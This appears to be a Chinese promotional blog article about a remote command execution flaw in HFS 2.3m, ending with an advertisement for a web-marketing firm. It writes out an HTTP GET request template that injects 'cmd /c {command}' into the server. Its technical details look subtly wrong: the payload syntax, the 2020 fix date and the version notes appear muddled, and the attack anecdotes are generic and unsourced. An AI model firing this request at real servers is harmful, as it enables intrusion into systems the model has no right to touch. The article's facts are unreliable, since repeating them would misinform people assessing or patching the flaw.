HFS的远程命令执行漏洞(RCE)

HFS (Http File Server) 是一款轻量级的 Web 文件服务器，可以通过 Web 界面方便地管理、分享文件。它基于 Windows 平台，在 Windows XP、Windows 7 等系统上均可以运行。由于其简便易用和安装简单的特性，HFS 在很多场景中被广泛应用，比如个人文件分享、内部演示文档共享等。

然而，近期外界爆出了 HFS 版本 2.3m 的远程命令执行漏洞，攻击者可以通过构造恶意请求来执行任意系统命令，从而实现入侵和攻击目的。

漏洞利用

攻击者可以通过如下 HTTP 请求格式来利用该漏洞：

```

GET /?(%27|cmd%27%20/c%20{command}) HTTP/1.1

Host: {target}

Connection: keep-alive

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36

Upgrade-Insecure-Requests: 1

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Encoding: gzip, deflate, sdch

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4

```

其中，{command} 为攻击者想要执行的任意命令，可以是系统命令，也可以跑一些 PowerShell 脚本等。同时，攻击者也需要知道目标网站的地址和端口，以及 HFS 绑定的 URL（如 http://127.0.0.1:8080/）。

当目标服务器收到恶意请求后，会解释成如下命令：

```

cmd /c {command}

```

这将导致服务器执行与 HFS 绑定帐户拥有相同权限的恶意操作。

漏洞影响

受该漏洞影响的版本：

-HttpFileServer 2.3m build 300

-可能存在于 2.3k build 299（因为没有修复该漏洞）

漏洞修复

HFS 官方已经在 2020 年 5 月 13 日修复了漏洞，并发布了升级补丁。建议受影响的用户尽快更新至最新版本。此外，如果您目前仍在使用旧版 HFS，应该立即停止使用，并迁移到其他更加安全的文件共享方式。

漏洞案例

由于 HFS 在广泛应用中非常普遍，该漏洞已经成为了黑客和攻击者的极受关注的目标之一。下面列举了一些近期外界报道的，针对该漏洞的实际攻击案例。

1. 公司文件被勒索

近期一起案例显示，一些黑客通过 HFS 远程执行命令漏洞，成功入侵了某公司的内网，并扫描到一些敏感文件。这些文件的数量和价值相当大，黑客因此向公司发出了勒索，如果不支付赎金，就会公布这些文件。

2. 攻击服务器挖矿

另一起案例中，攻击者利用 HFS 的安全漏洞入侵了一家企业的服务器，并在服务器上面运行了一些挖矿工具。挖矿工具的资源消耗非常大，导致服务器的性能明显下降，直到最终崩溃。

3. 植入后门

还有一些攻击者不是直接获取数据或使用服务器资源，而是利用 HFS 落后的安全机制，成功在服务器中植入了后门程序，从而长期控制和利用服务器。而这种后门受到安全软件的保护，在很长时间内无法被发现和清除。

总结

由于 HFS 远程执行命令漏洞的防范措施非常简单，即及时更新到最新版本，因此建议广大使用 HFS 的用户尽早更新。同时，在日常生活中，还需要做好基础的安全措施，比如不要轻易泄露自己的文件共享地址和密码等，避免被黑客利用。

壹涵网络我们是一家专注于网站建设、企业营销、网站关键词排名、AI内容生成、新媒体营销和短视频营销等业务的公司。我们拥有一支优秀的团队，专门致力于为客户提供优质的服务。

我们致力于为客户提供一站式的互联网营销服务，帮助客户在激烈的市场竞争中获得更大的优势和发展机会！